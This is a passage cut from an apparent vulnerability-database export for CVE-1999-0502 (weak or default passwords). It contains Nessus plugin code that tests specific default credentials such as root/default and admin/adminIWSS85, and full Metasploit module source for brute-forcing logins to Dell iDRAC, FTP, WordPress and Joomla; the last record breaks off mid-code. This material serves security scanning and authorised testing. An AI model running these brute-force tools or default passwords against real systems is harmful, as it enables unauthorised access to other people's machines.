Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n # https://web.archive.org/web/20101029225701/http://robin-mesh.wik.is/Howto/Router_Access/SSH_Access\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d0967a9\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2017 Tenable Network Security, Inc.\");\n script_dependencie(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:33:55", "references": [], "pluginID": "17575", "description": "The account 'help' on the remote host does not have a password set. An attacker may use this to gain further privileges on this system.", "edition": 14, "reporter": "Tenable", "published": "2005-03-19T00:00:00", "title": "Unpassworded 'help' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2018-07-25T00:00:00", "cpe": [], "id": "ACCOUNT_HELP.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=17575", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"help\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17575);\n script_version (\"1.34\");\n script_cvs_date(\"Date: 2018/07/25 16:19:22\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_bugtraq_id(247);\n \n script_name(english:\"Unpassworded 'help' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'help' on the remote host does not have a password set. \nAn attacker may use this to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_end_attributes();\n\t\t \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:45:03", "references": [], "pluginID": "99246", "description": "The account 'admin' on the remote host has the default password 'adminIWSS85'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "edition": 5, "reporter": "Tenable", "published": "2017-04-07T00:00:00", "title": "Default Password 'adminIWSS85' for 'admin' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-11-20T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_ADMINIWSS85.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99246", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"adminIWSS85\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99246);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:55 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'adminIWSS85' for 'admin' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'adminIWSS85'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n\n script_dependencie(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:41:54", "references": ["http://www.nessus.org/u?ec6a297f"], "pluginID": "76941", "description": "The account 'root' on the remote host has the password 'default'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system.\n\nNote that F5 Networks is known to use these credentials to provide complete administrative access to its appliances.", "edition": 7, "reporter": "Tenable", "published": "2014-07-31T00:00:00", "title": "Default Password (default) for 'root' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-11-21T00:00:00", "cpe": ["cpe:/h:f5:big-ip"], "id": "ACCOUNT_ROOT_DEFAULT.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76941", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"default\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76941);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2017/11/21 16:18:53 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (default) for 'root' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'default'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\n\nNote that F5 Networks is known to use these credentials to provide\ncomplete administrative access to its appliances.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n # http://support.f5.com/kb/en-us/solutions/public/13000/100/sol13148.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ec6a297f\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2018-08-28T17:44:09", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access Controller 6 - Express version 1.50 and 1.85", "reporter": "Rapid7", "published": "2012-09-26T08:02:38", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/http/dell_idrac.rb", "type": "metasploit", "title": "Dell iDRAC Default Login", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/HTTP/DELL_IDRAC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Dell iDRAC Default Login',\n 'Description' => %q{\n This module attempts to login to a iDRAC webserver instance using\n default username and password. Tested against Dell Remote Access\n Controller 6 - Express version 1.50 and 1.85\n },\n 'Author' =>\n [\n 'Cristiano Maruti <cmaruti[at]gmail.com>'\n ],\n 'References' =>\n [\n ['CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path to the iDRAC Administration page', '/data/login']),\n OptPath.new('USER_FILE', [ false, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"idrac_default_user.txt\") ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"idrac_default_pass.txt\") ]),\n OptInt.new('RPORT', [true, \"Default remote port\", 443])\n ])\n\n register_advanced_options([\n OptBool.new('SSL', [true, \"Negotiate SSL connection\", true])\n ])\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n uri = normalize_uri(datastore['URI'])\n \"#{proto}://#{vhost}:#{rport}#{uri}\"\n end\n\n def do_login(user=nil, pass=nil)\n\n uri = normalize_uri(target_uri.path)\n auth = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'SSL' => true,\n 'vars_post' => {\n 'user' => user,\n 'password' => pass\n }\n })\n\n if(auth and auth.body.to_s.match(/<authResult>[0|5]<\\/authResult>/) != nil )\n print_good(\"#{target_url} - SUCCESSFUL login for user '#{user}' with password '#{pass}'\")\n report_cred(\n ip: rhost,\n port: rport,\n service_name: (ssl ? 'https' : 'http'),\n user: user,\n password: pass,\n proof: auth.body.to_s\n )\n return :next_user\n else\n print_error(\"#{target_url} - Dell iDRAC - Failed to login as '#{user}' with password '#{pass}'\")\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def run_host(ip)\n print_status(\"Verifying that login page exists at #{ip}\")\n uri = normalize_uri(target_uri.path)\n begin\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if (res and res.code == 200 and res.body.to_s.match(/<authResult>1/) != nil)\n print_status(\"Attempting authentication\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n\n elsif (res and res.code == 301)\n print_error(\"#{target_url} - Page redirect to #{res.headers['Location']}\")\n return :abort\n else\n print_error(\"The iDRAC login page does not exist at #{ip}\")\n return :abort\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n rescue ::OpenSSL::SSL::SSLError => e\n return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/dell_idrac.rb"}, {"lastseen": "2018-09-06T22:07:45", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.", "reporter": "Rapid7", "published": "2011-11-11T04:39:13", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/ftp_login.rb", "type": "metasploit", "title": "FTP Authentication Scanner", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-12-14T14:05:57", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/FTP/FTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/ftp'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n def proto\n 'ftp'\n end\n\n def initialize\n super(\n 'Name' => 'FTP Authentication Scanner',\n 'Description' => %q{\n This module will test FTP logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.\n },\n 'Author' => 'todb',\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::Proxies,\n Opt::RPORT(21),\n OptBool.new('RECORD_GUEST', [ false, \"Record anonymous/guest logins to the database\", false])\n ])\n\n register_advanced_options(\n [\n OptBool.new('SINGLE_SESSION', [ false, 'Disconnect after every login attempt', false])\n ]\n )\n\n deregister_options('FTPUSER','FTPPASS') # Can use these, but should use 'username' and 'password'\n @accepts_all_logins = {}\n end\n\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} - Starting FTP login sweep\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n prepended_creds: anonymous_creds\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::FTP.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n connection_timeout: 30,\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_data[:private_type] = :password\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\n\n\n # Always check for anonymous access by pretending to be a browser.\n def anonymous_creds\n anon_creds = [ ]\n if datastore['RECORD_GUEST']\n ['IEUser@', 'User@', 'mozilla@example.com', 'chrome@example.com' ].each do |password|\n anon_creds << Metasploit::Framework::Credential.new(public: 'anonymous', private: password)\n end\n end\n anon_creds\n end\n\n def test_ftp_access(user,scanner)\n dir = Rex::Text.rand_text_alpha(8)\n write_check = scanner.send_cmd(['MKD', dir], true)\n if write_check and write_check =~ /^2/\n scanner.send_cmd(['RMD',dir], true)\n print_status(\"#{rhost}:#{rport} - User '#{user}' has READ/WRITE access\")\n return 'Read/Write'\n else\n print_status(\"#{rhost}:#{rport} - User '#{user}' has READ access\")\n return 'Read-only'\n end\n end\n\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/ftp_login.rb"}, {"lastseen": "2018-02-06T08:23:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module attempts to authenticate against a Wordpress-site (via XMLRPC) using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.", "reporter": "Rapid7", "published": "2014-07-25T13:24:09", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb", "type": "metasploit", "title": "Wordpress XML-RPC Username/Password Login Scanner", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_XMLRPC_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/wordpress_rpc'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Wordpress XML-RPC Username/Password Login Scanner',\n 'Description' => '\n This module attempts to authenticate against a Wordpress-site\n (via XMLRPC) using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n ',\n 'Author' =>\n [\n 'Cenk Kalpakoglu <cenk.kalpakoglu[at]gmail.com>',\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://wordpress.org/'],\n ['URL', 'http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/'],\n ['CVE', '1999-0502'] # Weak password\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(80),\n ])\n\n deregister_options('BLANK_PASSWORDS') # we don't need this option\n end\n\n def run_host(ip)\n print_status(\"#{peer}:#{wordpress_url_xmlrpc} - Sending Hello...\")\n if wordpress_xmlrpc_enabled?\n vprint_good(\"XMLRPC enabled, Hello message received!\")\n else\n print_error(\"XMLRPC is not enabled! Aborting\")\n return :abort\n end\n\n print_status(\"Starting XML-RPC login sweep...\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n scanner = Metasploit::Framework::LoginScanner::WordpressRPC.new(\n configure_http_login_scanner(\n uri: wordpress_url_xmlrpc,\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 5,\n http_username: datastore['HttpUsername'],\n http_password: datastore['HttpPassword']\n )\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\"\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Could not connect\"\n end\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\"\n end\n invalidate_login(credential_data)\n end\n end\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb"}, {"lastseen": "2017-11-10T23:45:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks", "reporter": "Rapid7", "published": "2014-07-18T04:49:25", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb", "type": "metasploit", "title": "Joomla Bruteforce Login Utility", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_BRUTEFORCE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Joomla Bruteforce Login Utility',\n 'Description' => 'This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks',\n 'Author' => 'luisco100[at]gmail.com',\n 'References' =>\n [\n ['CVE', '1999-0502'] # Weak password Joomla\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptPath.new('USERPASS_FILE', [false, 'File containing users and passwords separated by space, one pair per line',\n File.join(Msf::Config.data_directory, 'wordlists', 'http_default_userpass.txt')]),\n OptPath.new('USER_FILE', [false, 'File containing users, one per line',\n File.join(Msf::Config.data_directory, 'wordlists', \"http_default_users.txt\")]),\n OptPath.new('PASS_FILE', [false, 'File containing passwords, one per line',\n File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')]),\n OptString.new('AUTH_URI', [true, 'The URI to authenticate against', 